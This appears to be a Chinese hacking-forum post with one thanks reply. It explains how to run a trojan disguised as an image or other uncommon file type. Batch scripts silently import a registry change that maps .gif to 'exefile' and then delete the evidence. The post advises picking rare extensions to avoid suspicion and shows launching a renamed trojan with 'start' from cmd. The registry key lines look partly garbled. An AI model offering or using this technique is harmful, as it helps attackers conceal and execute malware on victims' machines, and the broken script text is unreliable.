另类方式运行木马,高度隐藏!
任意文件当做木马来运行你见过gif、jpg、jpeg、bmp等后缀文件当做木马来运行吗?一个小技巧可以把任意后缀文件当做EXE程序文件来运行。
ps:最好不要改成常用的文件类型,因为这样可能引起怀疑,最好改成不常用的文件后缀,比如:.Tgl,frc等
这样不影响原来系统功能,又能深藏起来更改exe为gif:(这里你可以把Exe改成其他,如:TGl)
复制内容到剪贴板 程序代码@echo off
color 1A
ECHO Windows Registry Editor Version 5.00>gif.reg
ECHO >>gif.reg
ECHO “Content Type”=“application/x-msdownload”>>gif.reg
ECHO @=“exefile”>>gif.reg
regedit /s gif.reg>nul 2>nul
del /s gif.reg>nul 2>nul
这个代码保存成。BAT的文件。
先运行这个BAT文件系统会把。GIF文件来当做应用程序来运行
当然我们的木马后缀要换成。GIF 的,嘻嘻。
恢复gif默认:
复制内容到剪贴板 程序代码@echo off
color 1A
ECHO Windows Registry Editor Version 5.00>gif.reg
ECHO >>gif.reg
ECHO “Content Type”=“image/gif”>>gif.reg
ECHO @=“giffile”>>gif.reg
regedit /s gif.reg>nul 2>nul
del /s gif.reg>nul 2>nul
这个代码保存成。BAT的文件。
另外,根据以前看到过的一篇文章 CMD也闹鬼,一文,我们还可以在批处理里面运行这类文件病毒,且不用上面的步骤,直接把你的EXE改成其他文件类型,然后面CMD下面,运行:
Start 木马.GPL
同样,也可以运行你的木马。是不是更简单? 不知道去哪里复制过来的 蛮有意思的谢谢分享
页:
[1]